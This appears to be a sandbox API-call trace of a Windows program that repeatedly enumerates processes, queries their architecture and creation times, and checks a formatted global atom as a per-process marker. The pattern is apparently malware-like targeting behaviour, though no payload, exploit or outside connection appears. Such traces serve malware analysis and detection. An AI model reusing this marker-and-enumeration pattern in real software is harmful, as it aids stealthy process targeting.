	[0113.446] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0113.446] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0113.446] GetProcessTimes (in: hProcess=0x690, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0113.447] wsprintfA (in: param_1=0x3993c40, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0113.447] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0113.447] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0113.447] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0113.448] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0113.448] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0113.448] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0113.448] CloseHandle (hObject=0x690) returned 1
	[0113.448] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0113.448] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x690
	[0113.448] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.448] CloseHandle (hObject=0x690) returned 1
	[0113.448] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x690
	[0113.448] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.448] CloseHandle (hObject=0x690) returned 1
	[0113.448] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x690
	[0113.448] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.448] CloseHandle (hObject=0x690) returned 1
	[0113.495] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0113.495] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0113.495] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0113.495] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0113.495] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0113.496] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0113.496] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0113.496] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0113.496] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0113.496] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0113.496] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0113.496] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0113.497] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0113.497] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0113.497] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0113.497] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0113.497] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0113.497] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0113.497] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x690
	[0113.497] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.498] CloseHandle (hObject=0x690) returned 1
	[0113.498] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0113.498] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0113.498] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x690
	[0113.498] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.498] CloseHandle (hObject=0x690) returned 1
	[0113.498] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0113.498] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x690
	[0113.498] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.498] CloseHandle (hObject=0x690) returned 1
	[0113.499] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x690
	[0113.499] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.499] CloseHandle (hObject=0x690) returned 1
	[0113.499] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x690
	[0113.499] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.499] CloseHandle (hObject=0x690) returned 1
	[0113.499] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x690
	[0113.499] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.499] CloseHandle (hObject=0x690) returned 1
	[0113.499] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x690
	[0113.499] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.499] CloseHandle (hObject=0x690) returned 1
	[0113.499] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x690
	[0113.499] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.499] CloseHandle (hObject=0x690) returned 1
	[0113.500] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0113.500] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x690
	[0113.500] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.500] CloseHandle (hObject=0x690) returned 1
	[0113.500] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x690
	[0113.500] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.500] CloseHandle (hObject=0x690) returned 1
	[0113.500] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x690
	[0113.500] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.500] CloseHandle (hObject=0x690) returned 1
	[0113.501] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x690
	[0113.501] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.501] CloseHandle (hObject=0x690) returned 1
	[0113.501] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x690
	[0113.501] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.501] CloseHandle (hObject=0x690) returned 1
	[0113.501] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x690
	[0113.501] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.501] CloseHandle (hObject=0x690) returned 1
	[0113.501] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x690
	[0113.501] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.501] CloseHandle (hObject=0x690) returned 1
	[0113.501] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x690
	[0113.501] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.502] CloseHandle (hObject=0x690) returned 1
	[0113.502] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x690
	[0113.502] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.502] CloseHandle (hObject=0x690) returned 1
	[0113.502] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x690
	[0113.502] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.502] CloseHandle (hObject=0x690) returned 1
	[0113.502] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x690
	[0113.502] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.502] CloseHandle (hObject=0x690) returned 1
	[0113.502] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x690
	[0113.502] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.502] CloseHandle (hObject=0x690) returned 1
	[0113.502] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x690
	[0113.502] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.503] CloseHandle (hObject=0x690) returned 1
	[0113.503] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x690
	[0113.503] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.503] CloseHandle (hObject=0x690) returned 1
	[0113.503] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x690
	[0113.503] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.503] CloseHandle (hObject=0x690) returned 1
	[0113.503] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x690
	[0113.503] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.503] CloseHandle (hObject=0x690) returned 1
	[0113.503] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x690
	[0113.503] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.503] CloseHandle (hObject=0x690) returned 1
	[0113.504] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x690
	[0113.504] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.504] CloseHandle (hObject=0x690) returned 1
	[0113.504] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x690
	[0113.504] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.504] CloseHandle (hObject=0x690) returned 1
	[0113.504] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x690
	[0113.504] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.504] CloseHandle (hObject=0x690) returned 1
	[0113.504] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x690
	[0113.504] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.504] CloseHandle (hObject=0x690) returned 1
	[0113.504] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x690
	[0113.504] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.504] CloseHandle (hObject=0x690) returned 1
	[0113.505] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x690
	[0113.505] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.505] CloseHandle (hObject=0x690) returned 1
	[0113.505] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x690
	[0113.505] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0113.505] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0113.505] GetProcessTimes (in: hProcess=0x690, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0113.505] wsprintfA (in: param_1=0x39938f8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0113.506] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0113.506] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0113.506] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0113.506] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0113.506] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0113.506] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0113.508] CloseHandle (hObject=0x690) returned 1
	[0113.508] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0113.508] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x690
	[0113.508] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.508] CloseHandle (hObject=0x690) returned 1
	[0113.508] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x690
	[0113.508] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.508] CloseHandle (hObject=0x690) returned 1
	[0113.508] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x690
	[0113.508] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.509] CloseHandle (hObject=0x690) returned 1
	[0113.567] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0113.568] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0113.568] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0113.568] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0113.568] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0113.568] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0113.568] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0113.569] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0113.569] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0113.569] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0113.569] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0113.569] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0113.569] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0113.569] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0113.570] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0113.570] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0113.570] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0113.570] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0113.570] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x690
	[0113.570] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.570] CloseHandle (hObject=0x690) returned 1
	[0113.570] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0113.570] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0113.571] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x690
	[0113.571] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.571] CloseHandle (hObject=0x690) returned 1
	[0113.571] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0113.571] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x690
	[0113.571] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.571] CloseHandle (hObject=0x690) returned 1
	[0113.571] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x690
	[0113.571] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.571] CloseHandle (hObject=0x690) returned 1
	[0113.571] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x690
	[0113.571] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.571] CloseHandle (hObject=0x690) returned 1
	[0113.572] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x690
	[0113.572] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.572] CloseHandle (hObject=0x690) returned 1
	[0113.572] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x690
	[0113.572] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.572] CloseHandle (hObject=0x690) returned 1
	[0113.572] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x690
	[0113.572] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.572] CloseHandle (hObject=0x690) returned 1
	[0113.572] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0113.572] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x690
	[0113.572] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.572] CloseHandle (hObject=0x690) returned 1
	[0113.573] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x690
	[0113.573] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.573] CloseHandle (hObject=0x690) returned 1
	[0113.573] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x690
	[0113.573] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.573] CloseHandle (hObject=0x690) returned 1
	[0113.573] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x690
	[0113.573] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.573] CloseHandle (hObject=0x690) returned 1
	[0113.573] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x690
	[0113.573] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.573] CloseHandle (hObject=0x690) returned 1
	[0113.573] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x690
	[0113.573] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.573] CloseHandle (hObject=0x690) returned 1
	[0113.574] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x690
	[0113.574] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.574] CloseHandle (hObject=0x690) returned 1
	[0113.574] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x690
	[0113.574] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.574] CloseHandle (hObject=0x690) returned 1
	[0113.574] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x690
	[0113.574] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.574] CloseHandle (hObject=0x690) returned 1
	[0113.574] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x690
	[0113.574] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.574] CloseHandle (hObject=0x690) returned 1
	[0113.574] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x690
	[0113.574] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.575] CloseHandle (hObject=0x690) returned 1
	[0113.575] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x690
	[0113.575] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.575] CloseHandle (hObject=0x690) returned 1
	[0113.575] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x690
	[0113.575] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.575] CloseHandle (hObject=0x690) returned 1
	[0113.575] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x690
	[0113.575] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.575] CloseHandle (hObject=0x690) returned 1
	[0113.575] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x690
	[0113.575] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.575] CloseHandle (hObject=0x690) returned 1
	[0113.575] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x690
	[0113.576] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.576] CloseHandle (hObject=0x690) returned 1
	[0113.576] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x690
	[0113.576] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.576] CloseHandle (hObject=0x690) returned 1
	[0113.576] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x690
	[0113.576] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.576] CloseHandle (hObject=0x690) returned 1
	[0113.577] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x690
	[0113.577] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.577] CloseHandle (hObject=0x690) returned 1
	[0113.577] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x690
	[0113.577] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.577] CloseHandle (hObject=0x690) returned 1
	[0113.577] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x690
	[0113.577] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.577] CloseHandle (hObject=0x690) returned 1
	[0113.577] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x690
	[0113.577] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.577] CloseHandle (hObject=0x690) returned 1
	[0113.577] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x690
	[0113.577] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.578] CloseHandle (hObject=0x690) returned 1
	[0113.578] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x690
	[0113.578] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0113.578] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0113.578] GetProcessTimes (in: hProcess=0x690, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0113.578] wsprintfA (in: param_1=0x3993268, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0113.579] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0113.579] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0113.579] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0113.579] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0113.579] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0113.579] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0113.580] CloseHandle (hObject=0x690) returned 1
	[0113.580] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0113.580] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x690
	[0113.580] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.580] CloseHandle (hObject=0x690) returned 1
	[0113.580] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x690
	[0113.580] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.580] CloseHandle (hObject=0x690) returned 1
	[0113.580] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x690
	[0113.580] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
